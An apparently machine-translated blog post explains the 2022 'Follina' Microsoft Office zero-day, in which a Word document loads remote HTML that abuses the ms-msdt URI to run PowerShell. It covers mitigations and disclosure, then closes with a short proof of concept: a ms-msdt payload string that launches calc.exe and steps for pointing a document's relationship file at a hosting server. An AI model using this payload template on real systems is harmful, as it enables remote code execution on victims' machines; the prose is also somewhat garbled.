Microsoft Office Zero-day (AKA ‘Follina’)

3 min readJun 14, 2022

Security researchers have discovered a vulnerability Zero-day new vulnerability Microsoft Office used in the attack to execute commands PowerShell malicious software via Microsoft Windows Support Diagnostic Tool (MSDT) just open a Word document, even open a preview, open read-only, Or open it in Word with the macro feature turned off. The new Zero-day is a new type of attack using Microsoft Office programs because it runs without high privileges. Bypasses Windows Defender detection and does not require any macro code to run binaries or scripts.

Microsoft Office Zero day

There is a pattern of attack which uses an external link of Word to load HTML and is executed via ‘ms-msdt’ to execute PowerShell code.”

The researchers further pointed out that Word documents can be dangerous if not checked before use. The attackers run the code through HTML and use Microsoft’s MS-MSDT URI format to run PowerShell. The researchers also added that it uses the Protect View feature in Microsoft Office, which is designed to warn users of corrupted Office files. It can be dangerous if enabled.

However, this feature may not be of much help if the attacker converts the document to an RTF (Rich Text Format) file, which can allow the attacker to run the script without requiring the victim to open the file. This attack is known as “zero-click exploitation.”

The researchers said it depends on the payload used by the attacker. This could allow an attacker to gather a hash of the victim’s Windows machine’s password.

How to prevent early

The researchers point out that this method of protection against the vulnerability is difficult because an attacker’s Word document is set a payload before it is sent to the recipient, preventing the system from detecting whether it is a malicious file or not to disable The MSDT-URL protocol used by attackers to execute code and disables the Preview pane in Windows Explorer, as it could be a payload used by attackers to exploit document preview victims.

Reported to Microsoft in April.

Researchers have reported the vulnerability to Microsoft since April, but Microsoft views it as not a security-related issue. However, on April 12, Microsoft closed reports of vulnerability (tracked as VULN-065524). and classified as “This issue has been resolved” with security implications for remote code execution.

POC

1.start with make web server and place simple html with this payload

window.location.href = “ms-msdt:/id PCWDiagnostic /skip force /param \”IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX(‘calc.exe’))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \””;

2.open word files with winzip, go to word\rels\document.xml.rels and edit ip